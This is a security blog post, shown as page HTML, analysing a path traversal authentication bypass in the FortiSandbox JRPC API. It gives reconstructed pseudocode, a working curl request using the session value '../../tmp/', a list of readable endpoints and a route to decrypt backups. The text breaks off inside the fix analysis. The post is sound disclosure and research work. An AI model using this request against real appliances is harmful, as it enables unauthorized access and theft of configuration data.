<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API" />
<meta name="author" content="imjdl" />
<meta property="og:locale" content="en" />
<meta name="description" content="Background" />
<meta property="og:description" content="Background" />
<link rel="canonical" href="/posts/blog_cve_2026_39813_en/" />
<meta property="og:url" content="/posts/blog_cve_2026_39813_en/" />
<meta property="og:site_name" content="imjdl blog" />
<meta property="og:image" content="/assets/img/20260421/logo.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-04-21T12:34:00+08:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/img/20260421/logo.png" />
<meta property="twitter:title" content="CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API" />
<meta name="twitter:site" content="@Mortyjin" />
<meta name="twitter:creator" content="@MortyJin" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"imjdl","url":"https://github.com/imjdl/"},"dateModified":"2026-04-21T12:34:00+08:00","datePublished":"2026-04-21T12:34:00+08:00","description":"Background","headline":"CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API","image":"/assets/img/20260421/logo.png","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/blog_cve_2026_39813_en/"},"url":"/posts/blog_cve_2026_39813_en/"}</script>
<!-- End Jekyll SEO tag -->


  <title>CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API | imjdl blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="imjdl blog">
<meta name="application-name" content="imjdl blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js,npm/mermaid@11.4.0/dist/mermaid.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>


  <!-- MathJax -->
  <script async src="/assets/js/data/mathjax.js"></script>
  <script async src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script>
  <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-chtml.js"></script>


<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/log.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">imjdl blog</a>
    <p class="site-subtitle fst-italic mb-0">Perpetual student, continual incremental improvement.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/reading-list/" class="nav-link">
            <i class="fa-fw fa fa-list-alt"></i>
            

            <span>READING LIST</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/imjdl"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/Mortyjin"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['imelloit','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776746040"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr 21, 2026
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/20260421/logo.png" class="popup img-link preview-img shimmer"><img src="/assets/img/20260421/logo.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/imjdl/">imjdl</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1117 words"
>
  <em>6 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">CVE-2026-39813 Deep Dive Path Traversal Authentication Bypass in FortiSandbox JRPC API</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="background"><span class="me-2">Background</span><a href="#background" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>On April 14, 2026, Fortinet published security advisory FG-IR-26-112 disclosing a critical path traversal vulnerability in FortiSandbox — <strong>CVE-2026-39813</strong> (CVSS 9.1). The vulnerability affects FortiSandbox 4.4.0–4.4.8 and 5.0.0–5.0.5, and was patched in 4.4.9 and 5.0.6.</p>

<p>This post presents a detailed technical analysis based on firmware reverse engineering, reconstructing the full exploit chain from bytecode-level analysis.</p>

<h2 id="summary"><span class="me-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><strong>Vulnerability Type:</strong> The <code class="language-plaintext highlighter-rouge">is_valid_session()</code> function in the JRPC API passes user-supplied <code class="language-plaintext highlighter-rouge">session</code> directly into <code class="language-plaintext highlighter-rouge">os.path.join(DIRRPCSESS, session_id)</code> without input validation</li>
  <li><strong>Exploitation:</strong> Constructing <code class="language-plaintext highlighter-rouge">session: "../../tmp/"</code> bypasses authentication — <code class="language-plaintext highlighter-rouge">/tmp/</code> always exists and its mtime is continuously refreshed</li>
  <li><strong>Impact:</strong> Unauthenticated read access to system version, hostname, serial number, CPU/RAM/disk usage, scan configuration, and a 32KB encrypted system backup</li>
  <li><strong>Prerequisites:</strong> None — no credentials are required; a single HTTP request is sufficient to trigger the vulnerability</li>
</ul>

<h2 id="authentication-architecture"><span class="me-2">Authentication Architecture</span><a href="#authentication-architecture" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>FortiSandbox’s web management interface is built on Django with a two-layer authentication architecture:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>HTTP Request
  │
  ├── Layer 1: Django Middleware — FSAuthenticationMiddleware
  │     ├── /jsonrpc is in AUTH_PATH_EXCEPTIONS whitelist → Skip auth
  │     └── Other paths → authenticate() checks session cookie
  │
  └── Layer 2: JRPC Built-in Authentication
        └── is_valid_session() validates session_id
</pre></td></tr></tbody></table></code></div></div>

<p><strong>Layer 1:</strong> <code class="language-plaintext highlighter-rouge">/jsonrpc</code> is listed in the middleware whitelist, so Django performs no authentication check. This is by design — JRPC has its own session-based authentication system.</p>

<p><strong>Layer 2:</strong> That independent authentication system contains a path traversal vulnerability.</p>

<h2 id="root-cause-analysis"><span class="me-2">Root Cause Analysis</span><a href="#root-cause-analysis" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The vulnerability resides in <code class="language-plaintext highlighter-rouge">apps/jsonrpc/rpcsession.pyc</code> within the <code class="language-plaintext highlighter-rouge">is_valid_session()</code> function:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="c1"># Reconstructed pseudocode (CPython 3.10 bytecode disassembly via xdis)
</span><span class="k">def</span> <span class="nf">is_valid_session</span><span class="p">(</span><span class="n">session_id</span><span class="p">,</span> <span class="n">remote_ip</span><span class="p">):</span>
    <span class="n">fpath</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">DIRRPCSESS</span><span class="p">,</span> <span class="n">session_id</span><span class="p">)</span>  <span class="c1"># DIRRPCSESS = "/usr/rpcsess/"
</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">exists</span><span class="p">(</span><span class="n">fpath</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">False</span>

    <span class="n">mtime</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">getmtime</span><span class="p">(</span><span class="n">fpath</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">mtime</span> <span class="o">&gt;</span> <span class="n">RPC_SESSION_TIMEOUT</span><span class="p">:</span>  <span class="c1"># 3600 seconds
</span>        <span class="k">return</span> <span class="bp">False</span>

    <span class="nf">renew_session</span><span class="p">(</span><span class="n">fpath</span><span class="p">)</span>  <span class="c1"># os.path.utime(fpath, None) — refreshes mtime
</span>    <span class="k">return</span> <span class="bp">True</span>
</pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">session_id</code> originates from the HTTP request JSON body and is fully attacker-controlled. However, the function passes it to <code class="language-plaintext highlighter-rouge">os.path.join()</code> without any filtering or format validation:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Input</th>
      <th>Resolved Path</th>
      <th>Result</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">"abc123def456..."</code> (valid session)</td>
      <td><code class="language-plaintext highlighter-rouge">/usr/rpcsess/abc123def456...</code></td>
      <td>Normal auth</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">"../../tmp/"</code> (attack)</td>
      <td><code class="language-plaintext highlighter-rouge">/usr/rpcsess/../../tmp/</code> = <code class="language-plaintext highlighter-rouge">/tmp/</code></td>
      <td><strong>Bypass</strong></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">"../../etc/hostname"</code> (attack)</td>
      <td><code class="language-plaintext highlighter-rouge">/usr/rpcsess/../../etc/hostname</code> = <code class="language-plaintext highlighter-rouge">/etc/hostname</code></td>
      <td><strong>Bypass</strong></td>
    </tr>
  </tbody>
</table></div>

<p><code class="language-plaintext highlighter-rouge">os.path.join()</code> preserves leading <code class="language-plaintext highlighter-rouge">..</code> components — the Python standard library does not sanitize paths. The session is considered valid if the resolved path meets two conditions:</p>
<ol>
  <li>The file/directory <strong>exists</strong></li>
  <li>Its mtime is within <strong>3600 seconds</strong> of the current time</li>
</ol>

<h2 id="why-tmp-is-the-optimal-choice"><span class="me-2">Why <code class="language-plaintext highlighter-rouge">/tmp/</code> Is the Optimal Choice</span><a href="#why-tmp-is-the-optimal-choice" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>An attacker needs to construct a path that always exists and has a continuously refreshed mtime. <code class="language-plaintext highlighter-rouge">/tmp/</code> is a reliable choice:</p>

<ul>
  <li>Every running FortiSandbox instance has a <code class="language-plaintext highlighter-rouge">/tmp/</code> directory</li>
  <li>System cron jobs, log rotation, Redis caching, and various internal processes write to <code class="language-plaintext highlighter-rouge">/tmp/</code> continuously</li>
  <li><code class="language-plaintext highlighter-rouge">renew_session()</code> calls <code class="language-plaintext highlighter-rouge">os.path.utime(fpath, None)</code> after successful validation, so the session remains valid indefinitely as long as a request is sent at least once per hour</li>
</ul>

<h2 id="attack-demonstration"><span class="me-2">Attack Demonstration</span><a href="#attack-demonstration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="1-unauthenticated-system-information-disclosure"><span class="me-2">1. Unauthenticated System Information Disclosure</span><a href="#1-unauthenticated-system-information-disclosure" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>curl <span class="nt">-k</span> <span class="nt">-X</span> POST <span class="s2">"https://TARGET/fortisandbox/jsonrpc/"</span> <span class="se">\</span>
  <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span>
  <span class="nt">-d</span> <span class="s1">'{
    "id": 1,
    "session": "../../tmp/",
    "method": "get",
    "params": [{"url": "sys/status"}],
    "ver": "2.0"
  }'</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The response contains 26 fields of system information:</p>

<div class="language-json highlighter-rouge"><div class="code-header">
        <span data-label-text="JSON"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre><span class="p">{</span><span class="w">
  </span><span class="nl">"result"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"code"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nl">"message"</span><span class="p">:</span><span class="w"> </span><span class="s2">"OK"</span><span class="p">},</span><span class="w">
    </span><span class="nl">"data"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FortiSandbox-VM v4.48,build0412,251007 (GA)"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Serial-Number"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FSA-VM0000000000"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FSA-VM0000000000"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"System-Time"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-21 10:30:00"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Disk-Usage"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2.05%"</span><span class="p">,</span><span class="w">
      </span><span class="err">...</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="2-bulk-enumeration-of-50-jrpc-endpoints"><span class="me-2">2. Bulk Enumeration of 50+ JRPC Endpoints</span><a href="#2-bulk-enumeration-of-50-jrpc-endpoints" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Complete firmware audit reveals the following JRPC API endpoints:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Category</th>
      <th>Endpoint</th>
      <th>Auth Bypass Result</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>System Info</td>
      <td><code class="language-plaintext highlighter-rouge">sys/status</code>, <code class="language-plaintext highlighter-rouge">sys/system_resource</code></td>
      <td>Readable</td>
    </tr>
    <tr>
      <td>Scan Config</td>
      <td><code class="language-plaintext highlighter-rouge">config/scan/options</code>, <code class="language-plaintext highlighter-rouge">config/scan/file_exts</code></td>
      <td>Readable</td>
    </tr>
    <tr>
      <td>System Backup</td>
      <td><code class="language-plaintext highlighter-rouge">backup/config</code></td>
      <td>Readable (32KB encrypted)</td>
    </tr>
    <tr>
      <td>Network Config</td>
      <td><code class="language-plaintext highlighter-rouge">config/system/interface</code>, <code class="language-plaintext highlighter-rouge">config/system/dns</code></td>
      <td>Permission required</td>
    </tr>
    <tr>
      <td>Admin Mgmt</td>
      <td><code class="language-plaintext highlighter-rouge">config/system/administrator</code></td>
      <td>Permission required</td>
    </tr>
  </tbody>
</table></div>

<p>Read-only endpoints (those without <code class="language-plaintext highlighter-rouge">has_admin_write_permission</code> checks) are fully exploitable for data exfiltration.</p>

<h3 id="3-download-encrypted-system-backup"><span class="me-2">3. Download Encrypted System Backup</span><a href="#3-download-encrypted-system-backup" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>backup/config → Returns 32KB OpenSSL-encrypted data (Salted__ prefix)
</pre></td></tr></tbody></table></code></div></div>

<p>The encryption key is stored in <code class="language-plaintext highlighter-rouge">/etc/secret_key</code>. If the attacker can also read this file via path traversal, the complete system configuration can be decrypted offline.</p>

<h2 id="dual-path-design-issue-in-process"><span class="me-2">Dual-Path Design Issue in process()</span><a href="#dual-path-design-issue-in-process" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>During the audit, another design issue was discovered in <code class="language-plaintext highlighter-rouge">rpc.pyc</code>’s <code class="language-plaintext highlighter-rouge">process()</code> function, which has two request handling paths:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>Path A (form-urlencoded POST):
  data = json.loads(request.POST['data'])
  is_valid_session(data['session'], remote_ip)  ← Session check present
  ↓ True → Continue processing

Path B (JSON body / fallback):
  json.loads(request.body)  ← Direct parse, no session extraction
  → URL routing dispatch    ← No session check at all!
</pre></td></tr></tbody></table></code></div></div>

<p>Path B (<code class="language-plaintext highlighter-rouge">Content-Type: application/json</code>) completely skips the <code class="language-plaintext highlighter-rouge">is_valid_session()</code> call. This means JSON-formatted requests bypass not only the middleware but also the RPC layer’s session check. Security relies entirely on individual handler permissions — a fragile defense-in-depth model.</p>

<h2 id="permission-model-analysis"><span class="me-2">Permission Model Analysis</span><a href="#permission-model-analysis" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>High-risk operations (password change, network config modification) have additional protections:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">has_admin_write_permission</span><span class="p">(</span><span class="n">sess_id</span><span class="p">):</span>
    <span class="n">user</span> <span class="o">=</span> <span class="nf">get_username_by_sessionid</span><span class="p">(</span><span class="n">sess_id</span><span class="p">)</span>  <span class="c1"># Reads username from session file
</span>    <span class="n">perm</span> <span class="o">=</span> <span class="nf">get_user_privileges</span><span class="p">(</span><span class="n">user</span><span class="p">)</span>             <span class="c1"># Queries database for permissions
</span></pre></td></tr></tbody></table></code></div></div>

<p>When <code class="language-plaintext highlighter-rouge">session</code> is <code class="language-plaintext highlighter-rouge">../../tmp/</code>:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">get_username_by_sessionid()</code> attempts <code class="language-plaintext highlighter-rouge">open("/tmp/", "r")</code> → directory → raises <code class="language-plaintext highlighter-rouge">IsADirectoryError</code></li>
  <li>Exception is caught → returns <code class="language-plaintext highlighter-rouge">INVALID_SESSION</code></li>
</ul>

<p>Therefore, write operations requiring admin privileges are blocked under path traversal conditions. <strong>However, the information disclosure from read-only endpoints alone constitutes a significant security risk.</strong></p>

<h2 id="fix-analysis"><span class="me-2">Fix Analysis</span><a href="#fix-analysis" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Fortinet’s fix in 4.4.9 is elegantly simple — a regex whitelist before path concatenation:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
